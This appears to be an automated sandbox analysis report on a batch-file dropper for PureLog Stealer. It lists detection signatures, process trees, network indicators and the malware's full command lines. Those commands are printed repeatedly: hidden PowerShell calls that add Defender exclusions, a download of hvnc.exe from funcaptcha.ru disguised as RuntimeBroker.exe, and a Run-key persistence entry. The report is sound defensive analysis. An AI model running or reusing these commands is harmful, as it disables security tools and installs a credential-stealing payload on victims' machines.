
Windows Analysis Report
temp_script.bat

Overview

General Information

Sample name: temp_script.bat
Analysis ID: 1488895
MD5: 7972cb9d1ef5a286c735bb8da928fbda
SHA1: 98e294e14777cc9e5a3c7166b35b2feba3b3f140
SHA256: 649dd265b8599866e827d12135b10b2b415d221ca4db58e1cf8c602c6afa2466
Tags: bat, funcaptcha-ru

Detection

PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sigma detected: Set autostart key via New-ItemProperty Cmdlet
Yara detected Powershell download and execute
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: PowerShell DownloadFile
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Sigma detected: Windows Binaries Write Suspicious Extensions
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 2136 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cacls.exe (PID: 3136 cmdline: "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system" MD5: A353590E06C976809F14906746109758)
    • powershell.exe (PID: 1672 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 3868 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 5692 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 7064 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 1812 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 2284 cmdline: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • RuntimeBroker.exe (PID: 5676 cmdline: "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe" MD5: 7557AF6F3185128C25AEB092DC335975)
      • powershell.exe (PID: 2200 cmdline: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker' -Value '"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"' -PropertyType 'String' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
temp_script.bat | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
0000000B.00000002.3303350593.000000001C600000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
11.2.RuntimeBroker.exe.1c600000.2.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
11.2.RuntimeBroker.exe.1c600000.2.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
amsi64_2284.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

System Summary

Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2284, TargetFilename: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", CommandLine: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", ProcessId: 2284, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'", CommandLine: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'", ProcessId: 1672, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", CommandLine: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", ProcessId: 2284, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2136, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe" , ProcessId: 5676, ProcessName: RuntimeBroker.exe
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, ProcessId: 5676, TargetFilename: C:\Users\user\AppData\Roaming\RuntimeBroker.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Roaming\RuntimeBroker.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2200, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker
Source: Process started; Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro; Data: Command: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", CommandLine: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", ProcessId: 2284, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", CommandLine: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", ProcessId: 2284, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'", CommandLine: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'", ProcessId: 1672, ProcessName: powershell.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", CommandLine: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')", ProcessId: 2284, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'", CommandLine: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'", ProcessId: 1672, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker' -Value '"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"' -PropertyType 'String', CommandLine: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker' -Value '"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"' -PropertyType 'String', CommandLine|base64offset|contains: E^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, ParentProcessId: 5676, ParentProcessName: RuntimeBroker.exe, ProcessCommandLine: "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker' -Value '"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"' -PropertyType 'String', ProcessId: 2200, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: https://funcaptcha.ru/hvnc.exe; Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe; Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe; Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe; ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe; ReversingLabs: Detection: 65%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.5% probability
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe; Joe Sandbox ML: detected
Source: unknown; HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: global traffic; TCP traffic: 192.168.2.5:49705 -> 45.11.229.96:56001
Source: global traffic; HTTP traffic detected: GET /hvnc.exe HTTP/1.1, Host: funcaptcha.ru, Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 188.114.96.3
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: funcaptcha.ru
Source: global traffic; DNS traffic detected: DNS query: strompreis.ru
Source: powershell.exe, 0000000C.00000002.2227962406.0000028B2B76F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2227962406.0000028B2B8A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2209055197.0000028B1D0B4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.2209055197.0000028B1B921000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.2209055197.0000028B1B6F1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.2209055197.0000028B1B921000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000C.00000002.2209055197.0000028B1B6F1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000C.00000002.2209055197.0000028B1D0B4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.2209055197.0000028B1D0B4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.2209055197.0000028B1D0B4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: temp_script.bat; String found in binary or memory: https://funcaptcha.ru/hvnc.exe
Source: powershell.exe, 0000000C.00000002.2209055197.0000028B1B921000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll
Source: RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe
Source: RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe
Source: powershell.exe, 0000000C.00000002.2227962406.0000028B2B76F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2227962406.0000028B2B8A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2209055197.0000028B1D0B4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000C.00000002.2209055197.0000028B1CF2F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.orgX
Source: RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
Source: unknown; Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49704

            System Summary

            barindex
            Source: RuntimeBroker.exe.10.dr, Lfef.csLarge array initialization: Gergwerg: array initializer size 442911
            Source: RuntimeBroker.exe.11.dr, Lfef.csLarge array initialization: Gergwerg: array initializer size 442911
            Source: 11.2.RuntimeBroker.exe.12ae1a78.1.raw.unpack, Lfef.csLarge array initialization: Gergwerg: array initializer size 442911
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeJump to dropped file
            Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\WinEmptyfoldJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 11_2_00007FF848F1102A11_2_00007FF848F1102A
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 11_2_00007FF848F1135111_2_00007FF848F11351
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 11_2_00007FF848F10FE211_2_00007FF848F10FE2
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe 5FCEE9DA2E237DF74B7C2619BDE63DB40C92C2E6C51BD483C86F83DCDFDE1EAB
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\RuntimeBroker.exe 5FCEE9DA2E237DF74B7C2619BDE63DB40C92C2E6C51BD483C86F83DCDFDE1EAB
            Source: RuntimeBroker.exe.10.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: RuntimeBroker.exe.11.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, CQvMD0daJJ1yJw1vJfR.csCryptographic APIs: 'CreateDecryptor'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, CQvMD0daJJ1yJw1vJfR.csCryptographic APIs: 'CreateDecryptor'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, CQvMD0daJJ1yJw1vJfR.csCryptographic APIs: 'CreateDecryptor'
            Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@21/28@2/2
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeFile created: C:\Users\user\AppData\Roaming\RuntimeBroker.exeJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4440:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1900:120:WilError_03
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeMutant created: \Sessions\1\BaseNamedObjects\98216E3219
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3levjhjt.jrq.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" "
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\cacls.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe"
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker' -Value '"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"' -PropertyType 'String'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"Jump to behavior
            Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'"
            Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'"
            Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'"
            Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'"
            Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'"
